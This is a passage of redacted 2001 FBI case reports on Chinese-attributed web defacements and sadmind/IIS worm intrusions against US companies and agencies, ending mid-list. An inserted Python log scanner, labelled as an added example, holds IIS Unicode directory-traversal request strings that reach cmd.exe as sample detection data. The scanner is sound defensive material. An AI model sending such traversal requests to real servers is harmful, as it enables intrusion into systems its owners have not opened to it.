FEDERAL BUREAU OF INVESTIGATION


Date of transcription 05/08/2001 


[redacted], BOX USA GROUP, 2100 Sanders Road, Suite 200, Northbrook, Illinois, telephone number [redacted], was interviewed at his place of employment. After [redacted] was advised of the identity of the interviewing agent and the nature of the interview, he provided the following information:

[redacted], BOX USA GROUP, was also present during the interview.


The attack was against a server running Windows NT Version 4.0. The server was for BOX USA GROUP's internal Web site. The attacker was able to access the server through a known vulnerability in Windows NT Version 4.0. There were no indications of attacks on the other servers that BOX USA GROUP has running. The other servers do not have the same vulnerability and are not as accessible as the server running Windows NT Version 4.0. [redacted] believes that the attacker ran a "sniffer" and found the vulnerability on the server.


The attempt to deface the Web site was unsuccessful. [redacted] was able to see the derogatory statements aimed at the United States in the log files. There are statements in the log files such as "Hacked by the Chinese" and "Hacked by Lion". There was no defacement to BOX USA GROUP's public Web page.


The attackers were on the system for approximately twelve hours. During that time, they deleted files and gathered directory listings. The attacker did not erase any of their own files that they left behind, and the tools used by the attacker were not very sophisticated. [redacted] believes that the tools left behind are not damaging to BOX USA GROUP's system. [redacted] traced the tools used in the attack back to locations in China, Vietnam, Japan and Russia. The Internet Protocol (IP) addresses used in the attack were traced back to China.




[redacted] provided a printed sample of the log files taken from the server. This sample has been placed in an FD-340 Evidence Envelope. [redacted] will forward the complete log and firewall files to the investigating agent via e-mail. [redacted] will also forward a summary of the attack. The server will be backed up and a copy of the server's hard drive will be available to the investigating agent.

Investigation on 05/08/2001 at Northbrook, Illinois
File # [redacted]    Date dictated N/A
by SA [redacted]

This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; it and its contents are not to be distributed outside your agency.
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE    Date: 05/14/2001

To: Counter-Terrorism    Attn: NIPC, Computer Investigations Unit, Room 5965, SSA [redacted]
    Chicago    Attn: SA [redacted], 312-907-8680, NIPC Squad

From: Pittsburgh
      Squad 16, NIPC
      Contact: SA [redacted], 412-456-9281

Approved By: [redacted]

Drafted By: [redacted]

Case ID #: [redacted]


Title: Honkers Union of China; Computer Intrusion Matter; LIONWORM; ADOREWORM; WEB PAGE DEFACEMENTS


Synopsis: Initial reporting of incidents at Pittsburgh, PA. 


Administrative: Reference Bureau GroupWise e-mails from SSA [redacted] dated 5/2/2001 and 5/10/2001 to NIPC Supervisors.


Details: For information of the Bureau and Chicago Offices, the Pittsburgh Division is in receipt of complaints from two victims in the Pittsburgh territory. The first victim is identified as ANSYS, Incorporated, located at Southpointe, 275 Technology Drive, Canonsburg, PA 15317, telephone 724-746-3304. ANSYS is a software company which develops simulation software and is a contractor for the Department of Defense (DoD) and the National Aeronautics and Space Administration (NASA). ANSYS is a global corporation with offices in China, Japan, and Europe as well as the United States. The initial incident at ANSYS was reported on May 11, 2001. [redacted] is the Webmaster for ANSYS. [redacted] reported that the incident occurred on May 8, 2001 and affected the main www web server and the main web page index. The attack originated from three Internet Protocol (IP) addresses identified as follows:

1. 205.128.201.237

2. 202.97.28.24

3. [redacted]


An inquiry with the American Registry for Internet Numbers (ARIN) revealed that IP Address 205.128.201.237 is registered in the name Strayer College, 3045 Columbia Pike, Arlington, VA 22204, and the Coordinator is identified as [redacted], telephone [redacted]. The inquiry also revealed that IP Address [redacted] is registered in the name [redacted], telephone [redacted].

An inquiry with the Asia-Pacific Network Information Center (APNIC) revealed that IP Address 202.97.28.24 is registered in the name Chinanet-BB and appears to be an Internet backbone for China Telecom with a registered address at A12, Xin-Jir-Kou-Wai Street, Unknown City in China, telephone +86-10-62370437.


It is believed that the above addresses in the United States may be compromised and are being used by the intruders to attack the ANSYS site. ANSYS is running a Windows 2000 machine with Internet Information Server, Version 5, with Service Pack 1. It is believed this version is vulnerable to compromise via the SADMIND/IIS Worm, for which an alert was posted on the CERT Web Site on 5/8/2001. No additional information regarding the attacking sites is available at this time. Any decision to contact the attacking sites for interview is left to the discretion of the Chicago Division and NIPC. ANSYS has patched their system and upgraded IIS software to a current, more secure version.


In addition, an Allegheny County government services web 
site was also attacked via similar exploitation with the 
sadmind/IIS Worm and investigation is being conducted to identify 
particulars of the compromise. Forensic examination by certified 
personnel is being conducted to preserve original evidence at 
this time. 


Additional details will be forwarded to the Bureau and Chicago as appropriate.


In addition, Pittsburgh Division currently has two SAs and a Computer Scientist detailed as FBI liaisons to the Computer Emergency Response Team (CERT) at Carnegie Mellon University (CMU). Attempts are being made to identify additional victims willing to report incidents to law enforcement for additional investigation. Any additional information developed in this regard will be provided to the Bureau and Chicago for follow-up.


++ 




FD-302 (Rev. 10-6-95) 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/14/2001 


[redacted], SAFEWAY INSURANCE [...] (SAFEWAY), [redacted] Drive, Westmont, Illinois, telephone number [redacted], e-mail address [redacted], was interviewed at his place of employment. After he was advised as to the identities of the interviewing agents, he provided the following information:


The SAFEWAY Web site, www.safewayins.com, was defaced with the message "fuck USA Government fuck PoisonBOx contact:sysadmin@yahoo.com.cn". [redacted] discovered the defacement on May 7, 2001.

[redacted] has analyzed the server and determined that no information had been compromised. The hacker left an Internet Protocol address that [redacted] was able to determine was still running. [redacted] has obtained the log files and repaired the server. [redacted] provided the investigating agents a copy of the log files on compact disc.

The hacked server is not currently running; SAFEWAY has a backup server that is handling the Web site at this time. SAFEWAY's Web site is not elaborate, so one server is able to operate the Web site. There has not been any action against SAFEWAY's Web site since the initial defacement.

[redacted] estimated SAFEWAY's loss at approximately $10,000.

Investigation on 05/11/2001 at Westmont, Illinois
File # [redacted]    Date dictated N/A
by [redacted]
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE    Date: 05/09/2001

To: Counterterrorism    Attn: NIPC, CIOS/CIU, Room [redacted], SA [redacted]
    Chicago    Attn: SA [redacted]

From: Detroit

Approved By: [redacted]

Drafted By: [redacted]


Title: Subject:  Hacker/Honker Union of China 


Victim: Chicago Systems Group 
Type: Intrusion 
Date: 04/03/01 


SUBMISSION: [ ] Initial  [x] Supplemental  [ ] Closed

CASE OPENED: [...]

CASE CLOSED: [...]

[ ] No action due to state/local prosecution (Name/Number )
[ ] USA declination
[ ] Referred to Another Federal Agency (Name/Number: )
[ ] Placed in unaddressed work
[ ] Closed administratively
[ ] Conviction


COORDINATION: FBI Field Office: Chicago
Government Agency
Private Corporation

Company name/Government agency: Consumers Energy Corporation
Address/location: 1945 West Parnall Road, Jackson, Michigan 49201
Purpose of System: Post notifications regarding the status of Consumers' physical gas sites and receive information from gas broker companies on details of gas being placed into the Consumers' system.




Highest classification of information stored in system: N/A 


System Data: 
Hardware/configuration (CPU): Generic PC running a Pentium III processor.
Operating System: Windows NT 4.0 Service Pack 6a.
Software: Microsoft FrontPage, Microsoft IIS version 4, and a PowerBuilder executable which synced with a SQL Server database (separate server).


Security Features:

Security Software Installed: [ ] yes (identify )  [x] no

Logon Warning Banner: [ ] yes  [x] no

INTRUSION INFORMATION

Access for intrusion: [x] Internet connection  [ ] dial-up number  [ ] LAN (insider)
If Internet: Internet address: 1.206.10.45
Network name: www.gasnoms.consumersenergy.com


Method:
Technique(s) used in intrusion: Microsoft IIS Extended Unicode Directory Traversal Vulnerability (also Sadminds/IIS worm)

Path of intrusion:
addresses: 1. 211.97.114.240  2. 202.234.209.2  3. 134.241.140.239
country: 1. China  2. Japan  3. USA
facility: 1. China United Telecom Corp  2. Japan Network Info Center  3. Massachusetts Higher Ed Computer Network


Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 


Operating System: 
Software: 




Impact:


Compromise of classified information: [ ] yes  [x] no
Estimated number of computers affected: One

Estimated dollar loss to date: $5000
Category of Crime:

Impairment:
[ ] Malicious code inserted
[ ] Denial of service
[ ] Destruction of information/software
[x] Modification of information/software

Theft of Information:
[ ] Classified information compromised
[ ] Unclassified information compromised
[ ] Passwords obtained
[ ] Computer processing time obtained
[ ] Telephone services obtained
[ ] Application software obtained
[ ] Operating software obtained

Intrusion:
[x] Unauthorized access
[ ] Exceeding authorized access


REMARKS 


The victim site, www.gasnoms.consumersenergy.com, is used for two things: to post the status of Consumers' physical gas sites and to run a PowerBuilder program which allows gas companies to enter information into a database pertaining to gas that they put into the Consumers Energy gas system (an auditing system of sorts). This system has been mandated by the Federal Energy Regulatory Commission (FERC), but its impairment does not critically affect the company's ability to provide gas or energy.

There is a firewall which protects a large portion of the Consumers' network.

A customer from Detroit Edison (another energy company) noticed that her link to a part of the victim site was not working. She went to the main site and saw the "Fuck USA Government", "Fuck Poizon BOx", and "Contact sysadmcneyahoo.com.cn" messages.


++ 
FEDERAL BUREAU OF INVESTIGATION


(Rev. 08-28-2000) 


Precedence: ROUTINE    Date: 05/11/2001

To: Chicago    Attn: SA [redacted]

From: Detroit
      Squad C-12/Ann Arbor RA
      Contact: SA [redacted]

Approved By: [redacted]

Drafted By: [redacted]

Case ID #: [redacted]


Title: Hacker/Honker Union of China; Chicago Systems Group - Victim; Computer Intrusion

UNSUB(S); Consumers Energy Corporation, Jackson, Michigan - Victim; Computer Intrusion, Impairment


Synopsis: To advise of additional IP addresses for servers 
originating the Sadminds/IIS worm attack on Consumers Energy. 


Details: On May 11, [redacted], Consumers Energy Internet Infrastructure, provided the following IP addresses of servers attempting attacks on their network using the Sadminds/IIS worm:

12.44.37.253 on May 6, 2001 - Assigned to Lincom, Inc, Los Angeles, CA

211.251.218.5 on May 7, 2001 - Assigned to Korea Network Information Center

210.99.71.1 on May 9, 2001 - Assigned to National Computerization Agency, Korea

206.31.80.252 on May 10, 2001 - Assigned to ISP Channel, Mountain View, CA



LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO 


Read and clear. 
FEDERAL BUREAU OF INVESTIGATION


Date of transcription 05/10/01 


On May 8, 2001, the following Consumers Energy employees attended a meeting with the interviewing agent regarding the recent intrusion and webpage defacement of a Consumers Energy website: [names redacted]


The meeting was held at the Consumers Energy 
Corporate Head Quarters, 1945 Parnall, Jackson, Michigan, 49201, 
(517) 788-0528. 


[redacted] described events as such: he received a telephone call from [redacted], Detroit Edison, with notification that the Gas Nomination website, "www.gasnoms.consumersenergy.com", had been replaced with an obscene, anti-U.S. Government slogan. [redacted] checked the site and found that the files index.html, index.asp, default.html, and default.asp had all been replaced to show a slogan which read "fuck USA Government", "[...]izonBOx", and "contact Sysadmcneyahoo.com.cn". [redacted] then took the web server offline. He explained that the server only hosts the "gasnoms" site, which is used by approximately 100 gas broker companies to get information on Consumers' physical gas sites and to input information into an auditing system for gas distribution, such as how much gas they placed into Consumers' lines, where they connected, etc. The gasnoms program is executed by a PowerBuilder frontend GUI on this server, which connects to a separate server running the main application via port 1999. Another server runs Microsoft SQL Server, which stores the information. The application is password accessible only. An investigation showed that neither of the two latter servers were affected.


[redacted] commented on the history of the gasnoms site: the Federal Energy Regulatory Commission (FERC) mandates that a system which provides functionality similar to gasnoms be available to gas broker companies. Actually, the PowerBuilder program they use was recommended by FERC. The system is mainly used for auditing purposes, although they use the gasnoms website to post the status of their physical gas sites. The impairment of the gasnoms system in no way hinders gas broker companies from providing gas to Consumers. It would revert to telephone calls and facsimiles.

Investigation on 05/08/01 at Jackson, Michigan
File # [redacted]    Date dictated [redacted]
by [redacted]


[redacted] advised that the gasnoms server is running Microsoft Windows NT, version 4.0, service pack 6A, and Microsoft IIS. He checked the IIS logs and found the connections which performed the intrusion. He described it as consecutive HTTP commands which took advantage of an existing flaw in Windows NT and IIS. These were used to overwrite the four files with the obscene language (supra). [redacted] provided copies of the IIS logs showing the intrusions; he clarified that the times are Greenwich Mean Time (GMT).


[redacted] advised that their network topology includes a firewall, as well as a reverse-proxy server. The gasnoms site is behind the firewall, but not the reverse-proxy. The reverse-proxy blocked the attempts as "malformed URL requests". The firewall logged the connections; [redacted] is still in the process of examining those logs. He also advised that the "attacks" are still being executed against their network.


[redacted] advised that, as normal procedure, she notified one of the originating companies via e-mail of the incident, and recommended that they investigate and terminate the attacks. The company was China United Telecommunications Corporation, "cnuninet.net".

[redacted] believes that Consumers Energy has already expended over $5000 in investigative time on this incident, due to some of the critical systems which could have been affected.


On May 10, 2001, [redacted] contacted the writer and provided copies of the firewall logs showing unsuccessful attempts and Microsoft IIS logs which contain only the malicious entries. He advised that attempts are still being made, and are being blocked and logged; he will continue to provide the IP addresses of those servers. There are three originating IP addresses for the attacks: 211.97.114.240 (China United Telecommunications Corporation), 202.234.209.2 (DoCoMo Service Kansai Co), and 134.241.140.239 (Massachusetts Higher Education Network).
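The log review described in this interview (IIS logs showing consecutive HTTP requests against the Windows NT/IIS flaw the form names as the IIS Extended Unicode Directory Traversal Vulnerability, the reverse proxy rejecting them as "malformed URL requests", and a list of originating IP addresses handed to the ISPs) can be reproduced with a small log scanner. The Python below is an added example written for this page; it is not from the FBI file, from Consumers Energy, or from CERT. It assumes the IIS W3C extended log format with a `#Fields:` header and uses constructed log lines with documentation-range addresses, not the victim's ex010507.log or the addresses in the report. It flags two things: an overlong UTF-8 sequence in the request path (which a strict decoder rejects, but which the vulnerable IIS decoded after its path check), and a decoded path that climbs above the web root.

```python
"""Flag IIS Unicode directory-traversal attempts in W3C extended log lines.

Added example for this interview summary; not from the FBI file or the victim.
IIS writes W3C extended logs in GMT, which matches the interviewee's remark
about the log timestamps.
"""
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass
from urllib.parse import unquote_to_bytes

# Constructed sample log: documentation-range IPs, not the addresses in the report.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2001-05-07 14:02:11
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-07 14:02:11 192.0.2.10 GET /index.html - 200
2001-05-07 14:02:13 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe - 200
2001-05-07 14:02:14 198.51.100.7 GET /msadc/..%c1%9c..%c1%9c../winnt/system32/cmd.exe - 200
2001-05-07 14:02:20 192.0.2.11 GET /images/logo.gif - 200
2001-05-07 14:03:02 198.51.100.7 GET /scripts/../../winnt/system32/cmd.exe - 404
"""


@dataclass
class Finding:
    when: str      # date and time from the log (GMT)
    ip: str        # c-ip column
    uri: str       # raw cs-uri-stem as logged
    reason: str


def lenient_utf8(raw: bytes) -> tuple[str, bool]:
    """Decode UTF-8 the way a permissive decoder does: overlong forms are
    accepted instead of rejected, so the reviewer sees the path the
    vulnerable server acted on. Returns (text, saw_overlong)."""
    out: list[str] = []
    overlong = False
    i, n = 0, len(raw)
    while i < n:
        b = raw[i]
        if b < 0x80:                                   # plain ASCII
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < n and 0x80 <= raw[i + 1] < 0xC0:
            cp = ((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)   # 2-byte form
            overlong |= cp < 0x80                       # e.g. %c0%af -> '/'
            out.append(chr(cp))
            i += 2
        elif 0xE0 <= b < 0xF0 and i + 2 < n and all(0x80 <= x < 0xC0 for x in raw[i + 1:i + 3]):
            cp = ((b & 0x0F) << 12) | ((raw[i + 1] & 0x3F) << 6) | (raw[i + 2] & 0x3F)
            overlong |= cp < 0x800                      # 3-byte form
            out.append(chr(cp))
            i += 3
        else:                                          # stray byte: mark and continue
            out.append("\ufffd")
            i += 1
    return "".join(out), overlong


def escapes_web_root(path: str) -> bool:
    """True if '..' segments climb above the virtual root. IIS treats '\\'
    and '/' alike, so both count as separators here."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def scan_iis_log(text: str) -> list[Finding]:
    """Parse W3C extended lines using the #Fields: header and flag requests
    whose path uses overlong UTF-8 or resolves above the web root."""
    fields: list[str] = []
    findings: list[Finding] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        cols = line.split(" ")
        if len(cols) != len(fields):
            continue                                   # malformed line: skip
        rec = dict(zip(fields, cols))
        stem = rec.get("cs-uri-stem", "")
        decoded, overlong = lenient_utf8(unquote_to_bytes(stem))
        reasons = []
        if overlong:
            reasons.append("overlong UTF-8 in path")
        if escapes_web_root(decoded):
            reasons.append("traversal above web root")
        if reasons:
            findings.append(Finding(f"{rec['date']} {rec['time']}", rec["c-ip"], stem, "; ".join(reasons)))
    return findings


def sources(findings: list[Finding]) -> Counter:
    """Tally of source addresses, the list a victim would pass to the ISPs."""
    return Counter(f.ip for f in findings)


if __name__ == "__main__":
    hits = scan_iis_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f.when} GMT {f.ip} {f.uri}  [{f.reason}]")
    print("sources:", dict(sources(hits)))
```

The last sample line shows why the decoder matters: a plain `../../` request is refused by IIS (404) but still flagged as an attempt, while the `%c0%af` form only reveals itself as traversal once the overlong byte pair is decoded to `/`. Running the scanner over the real ex010507.log would require only that its `#Fields:` header list `date`, `time`, `c-ip` and `cs-uri-stem`.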


FD-302a (Rev. 10-6-95) 
Copies of the altered files (index and default), the IIS log files from [redacted] (ex010507.log and ex010508.log), and the firewall and extract IIS logs (logfiles.txt) have been placed on a 3.5" diskette and placed in the 1-A section of this file.

Attached and made part hereto is a copy of logfiles.txt (the firewall and extract IIS logs), as well as [...] information on the three originating addresses.


ATTACHMENT 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE    Date: 05/11/2001

To: Chicago    Attn: SA [redacted], (312) 431-1333

From: San Francisco
      14B/Hayward
      Contact: SA [redacted], (510) 886-7447

Approved By: [redacted]
Drafted By: [redacted]
Case ID #: [redacted]
Title: Honkers Union of China


Synopsis: Forward materials from victims in the San Francisco 
Division of web defacements originating in China. 


Reference: [...] e-mail from [redacted] to NIPC Supv., [...] 2001, Honkers Union of China, [...] signed [redacted], NIPC Computer Investigations Unit.
Enclosures: Twenty Nine (29) victim information documents.


Details: The San Francisco Division is forwarding the enclosed victim information/materials to the Chicago Division, case file [redacted]. The materials include FD-71's, e-mails, and NIPC Watch Reports from victim companies. In some cases, logs, copies of the defacement, and other information provided by the victims are provided.


The San Francisco Division will continue to forward 
victims/information as necessary. 


If there are any questions or comments, contact SA [redacted], Hayward RA, (510) 886-7447.




LEAD (s): 
Set Lead 1: 
CHICAGO 
AT CHICAGO 
Read and Clear 
FEDERAL BUREAU OF INVESTIGATION


Date of transcription 05/02/2001 


[redacted], CHICAGO SYSTEMS GROUP (CSG), [redacted] Avenue, Suite 3200, Chicago, Illinois, e-mail address [redacted], was interviewed at his place of employment. After he was advised as to the identities of the interviewing agent and computer scientist, he provided the following information:


Approximately two weeks before the attack on the Illinois Secretary of State computer system, [redacted] personal web site, [redacted], was defaced. The group claiming responsibility for the defacement was "Li0n Group", and the message displayed on the Web page was "Kill all Japanese".


The server for the Web site was a Linux box utilizing the Red Hat 7.0 operating system. The machine has been shut down by [redacted] since the attack. [redacted] believes that the attack was not directly aimed at his Web site, but that the hackers were attempting to use his Web site as a jumping off site to attack another Web site.


[redacted], CSG, will analyze the server and e-mail the results to the investigating agent.


Investigation on 05/02/2001 at Chicago, Illinois
File # [redacted]    Date dictated N/A
by [redacted]
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE    Date: 05/11/2001

To: Chicago    Attn: SA [redacted]

From: Detroit
      Squad C-12/Ann Arbor RA
      Contact: SA [redacted]

Approved By: [redacted]

Drafted By: [redacted]

Case ID #: [redacted]


Title: Hacker/Honker Union of China; Chicago Systems Group - Victim; Computer Intrusion

UNSUB(S); Consumers Energy Corporation, Jackson, Michigan - Victim; Computer Intrusion, Impairment


Synopsis: Forwarding all information pertaining to the use of 
the Sadminds/IIS worm against Consumers Energy Corporation for 
Chicago's coordination. Copy of information to Detroit Control 
file. 


Enclosures: For Chicago are: a 1-A envelope containing one (1) 
3.5" diskette with files obtained from victim; one FD-302 with 
attachments re interview with victim. For Detroit is one FD-302 
re victim interview. 


Details: On May 8, 2001, Consumers Energy Corporation, Jackson, Michigan, contacted the Ann Arbor FBI to advise of a compromise of their gas nomination website, "www.gasnoms.consumersenergy.com". Following an interview with numerous Consumers Energy personnel, it was evident that the only damage was the replacement of the index.html, default.html, index.asp, and default.asp files, which produced a new website yielding the slogan "fuck USA government", "fuck Poizon BOx", and "contact sysadmen@yahoo.com.cn". Pertinent files and logs were obtained.


On May 9, 2001, [redacted] obtained the CERT advisory CA-2001-11, which details the "Sadminds/IIS" worm and conformed to the Consumers Energy incident.


Upon contacting FBIHQ NIPC/CIU, SA [redacted] was advised by SA [redacted] that SA [redacted] has a case open and is coordinating the investigation of this worm attack.

SA [redacted] is forwarding all pertinent information re the attack on Consumers Energy to captioned Chicago case, as well as a copy to the Detroit control file.




LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO 


Read and clear. 
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE    Date: 05/10/2001

To: St. Louis    Attn: SA [redacted]; CART FE [redacted]
    Chicago    Attn: SA [redacted], NIPC Squad

From: St. Louis
      Squad 3
      Contact: SA [redacted], Ext. 2719

Approved By: [redacted]

Drafted By: [redacted]

Title: HONKER UNION OF CHINA; CHICAGO SYSTEMS GROUP


Synopsis: Request CART FE [redacted] create mirror images of two separate server hard drives and conduct examination for intrusion activity, commands and IP addresses.

Attachments: A copy of a handwritten document provided by [redacted] which lists the file names deleted, passwords, websites and financial losses.


Details: On May 9, 2001, [redacted], St. Louis Division, telephonically contacted [redacted], Electric man Internet Services, 754 Longlane Road, New Lenox, Illinois, 60451, telephone number [redacted]. [redacted] advised that his Web Hosting and Development business was attacked by Chinese hackers. [redacted] had filed a complaint with the St. Louis Division about the incident on 05/06/01. [redacted] servers are located at Cybercon, 210 N. Tucker, St. Louis, Missouri.


The first of two attacks was discovered on Sunday 
05/06/01 at 9AM and involved a server of 53 customer web sites. 
The attackers placed the China flag, music (possible national 
anthem of China), and political statements about the United 
States and President George W. Bush. The attackers deleted all 
the customer website files and deleted the logs of their 
intrusion activity. 


The second attack occurred on Monday, 05/07/01 at 2:02PM. [redacted] had been remotely working with the Testing and Development server and left to run an errand at 1PM. Upon his return, [redacted] discovered that the server had been attacked. The [...] Log and the Service Log. [redacted] was unable to reboot the server because the executable files had been deleted. The attackers had created new directories with the names "Fuck", "Fuck You", etc.

The Website had the message: Honker Union of China, Hacked by Redfreedom, USA=NAZI, Bush=Murderer, Beat Down Imperialism of America!.


SA [redacted] contacted [redacted] on 05/10/01 for an interview and to collect the two servers for examinations. [redacted] advised that he had a backup of the code for the websites and was in the process of trying to recreate the websites. Some of [redacted] customers had already contacted [redacted] and were advised of the attacks. [redacted] advised that he was a self-taught web page designer. [redacted] was not sure if the second attack on his Test/Development Server was the same hacker, because the defacement was different.


[redacted] had installed patches to his [...] server on Friday, 05/04/01, to prevent an intrusion. [redacted] is not sure if the attacker had already gained access before the patch was installed and placed a back door for re-entry.


On May 9, 2001, SA [redacted] contacted the NIPC Unit at HQ and was advised that Chicago would be the regional office for all China Web Defacement cases. SA [redacted] telephonically contacted the Chicago Division and talked with SA [redacted], who will be the case agent for the China attacks. [redacted] provided SA [redacted] with the file number [redacted] for the China attacks.


On May 10, 2001, a bureau E-mail was sent out to the 
NIPC field supervisors advising of the Honker Union of China 
attacks utilizing the Lion worm which has been causing DDoS 
attacks. 


LEAD (s): 
Set Lead 1: (Adm) 

ST. LOUIS 


AT ST. LOUIS, MISSOURI 


Request CART FE [redacted] create a mirror image of the two separate server hard drives. Examine the copies of the hard drives [...] are located in the evidence room. Also search [...]


Set Lead 2: 
CHICAGO 


AT CHICAGO, ILLINOIS 


For information only. 


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/09/2001 


[redacted], SyTec Business Solutions (SyTec), 19 West Hargett Street, Suite 900, Raleigh, NC 27601, telephone number [redacted], was advised of the identity of the interviewing agent and the purpose of the interview. Present and contributing to the interview were [redacted], SyTec, and [redacted], SyTec. During the interview [redacted] provided the following information:


The SyTec computer system is connected to the Internet 
behind a router and a Cisco Systems PIX firewall. The PIX firewall 
is located between the router and the SyTec computer system. The 
SyTec system is comprised of several computers to include computers 
named: Saturn, Jupiter, Neptune, and Alexis. Additionally, 
printers and client machines are part of the SyTec computer system. 


The Jupiter computer was intruded into from China. This began on 04/06/01 when Jupiter, housing the SyTec web server and running the Windows 2000 Operating System (OS) and Microsoft IIS 5.0, was connected to from the Internet Protocol (IP) address of 61.153.115.113; during this connection the web pages were viewed and scripts were copied. This was followed by connections on 04/07/01, beginning approximately 7:15am, from an IP address of 211.94.201.200. During this intrusion the Service Account Manager (SAM) was taken from the system. The IP's associated with the intrusions resolve to computers located in China.


Similar connections were made to the Alexis computer 
which was also running the Windows 2000 OS and Microsoft IIS 5.0. 
This computer was used for web connections by SyTec employees to 
access their E-mail. Connections to Alexis from China were from 
the following IP addresses:  61.153.115.113, 61.157.222.11, 
61.147.9.11, and 61.147.5.135, which resolve to computers located 
in China. The "MainLogonFrame" web page on Alexis was changed to: 


HACKED BY Q.C FROM CHINA!DON'T SPY US ANY LONGER!
:)
:)
TMD


Investigation on [redacted] at Raleigh, NC
File # [redacted]    Date dictated 05/09/01
by [redacted]
This change to the web page was found on 04/07/01 at approximately 10:00am. [redacted] repaired this web page during the 6:00pm to 8:00pm time frame on 04/07/01.


At approximately 10pm on 04/07/01, [redacted] discovered the "MainLogonFrame" web page on Alexis had been changed to:

sorry! hacked by q.c from china! don't spy us any more! :)

[redacted] repaired this page again on 04/08/01.


[redacted] believed "Ccc.exe" and "cmd.exe" were put on the SyTec computers and were an integral part of the intrusion.


[redacted] noted that their company had a higher profile in recent weeks following an advertisement which SyTec posted on the web site "computerjobs.com".


Recovering from these intrusions required approximately 
fifteen (15) work hours at an internal cost to SyTec of fifty 
dollars per hour ($50/hr). 


[redacted] provided hardcopies of logs, original and hacked web pages, and IP lookups during the interview. Furthermore, as agreed to during the interview, [redacted] subsequently provided copies of the IIS and PIX logs via E-mail.


The aforementioned copies are retained in the 1-A subsection of 
this case file. 
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE    Date: 05/10/2001
To: Chicago    Attn: SA [redacted]

From: Charlotte
      Squad 7, Raleigh Resident Agency
Approved By: [redacted]
Drafted By: [redacted]

Case ID #: [redacted] (Pending)


Title: HACKER/HONKER UNION OF CHINA; 
ILLINOIS SECRETARY OF STATE - VICTIM; 
INTRUSION - INFO SYSTEMS 
04/03/2001 
00: CG 


Synopsis: Various entities in North Carolina have experienced 
intrusions and attempted intrusions from UNSUB(S) emanating from 
Internet Protocol (IP) addresses resolving back to China. Other 
intrusions employing the sadmind/IIS Worm, as described in the 
CERT Advisory CA-2001-11, and possibly attributable to 
individuals in China have also been reported. Both financial and 
data losses in all cases have been minimal. This information is 
being forwarded to Chicago for whatever action deemed 
appropriate. No further investigation will be conducted by 
Charlotte at this time. 


Administrative: Reference telcalls on 05/09/01, between SA [redacted], NIPC, and SA [redacted] and Case Agent, SA [redacted], Chicago Division.


Enclosure(s): (7) Enclosed for Chicago are an original and one copy of an FD-302 documenting a 04/18/01 interview at SyTec Business Solutions (SyTec), one 1-A envelope containing documents obtained from SyTec or regarding the 04/18 interview, one 1-A envelope containing documents regarding an intrusion into the State of North Carolina's computer system, one 1-A envelope containing documents from SyTec regarding an intrusion into Craig Davis Properties' computer system, one 1-A envelope containing documents regarding an intrusion into Aerial Images' computer system, and one 1-A envelope containing documents regarding an intrusion into EPA's computer system.




Details: Various entities in North Carolina have experienced 
intrusions and attempted intrusions from UNSUB(S) emanating from 
Internet Protocol (IP) addresses resolving back to China. One 
such victim was SyTec Business Solutions (SyTec), 19 West Hargett 
Street, Suite 900, Raleigh, NC 27601, Telephone number: 919-856- 
2300. Details of the intrusions, occurring early April 2001, were provided by [redacted], SyTec, and are documented in the enclosed FD-302. SyTec computers running the Windows 2000 Operating System (OS) and Microsoft IIS 5.0 were connected to from the Internet Protocol (IP) addresses 61.153.115.113, 211.94.201.200, 61.157.222.11, 61.147.9.11, and 61.147.5.135. These IPs resolve to computers located in China.


On 04/19/01, [redacted], State of North Carolina, Office of Information Technology Services, telephone number: [redacted], advised a server in the governor's office had been compromised from an IP address of 211.99.199.75. This IP resolves to www.netxeyes.com, a computer in China. The compromised server was set up to be a master for a Distributed Denial of Service (DDoS) attack. After identifying the intrusion, [redacted] cleaned the intruder's files off of the system and ensured patches were properly installed. As a result, the DDoS attack was never launched. Information obtained from [redacted] is provided in an enclosed 1-A envelope. [redacted] is willing to provide further assistance should he be requested to do so.


On 05/03/01, [redacted], Special Agent, Environmental Protection Agency (EPA), Office of the Inspector General (OIG), Office of Investigation, 401 M Street, MC 2431, Washington, DC 20460, telephone number: [redacted] (office), [redacted] (cell), advised a computer at the EPA's facility in Research Triangle Park, NC was compromised. This intrusion emanated from an IP address of 202.110.94.135, which resolves to a computer located in China. The victim machine's web page was altered to display Chinese characters, which when translated stated something to the effect: PROTECT CHINA'S UNITY, INSIST ON ONE CHINA. SA [redacted] advised the EPA OIG was interested in pursuing this matter jointly with the FBI.


Other intrusions employing the sadmind/IIS Worm, as 
described in the CERT Advisory CA-2001-11, and possibly 
attributable to individuals in China have also been reported. 
Attached to and considered part of this EC is a copy of the CERT 
Advisory CA-2001-11 which explains in detail the employed attack. 


Attacks associated with this attack methodology 
include: 


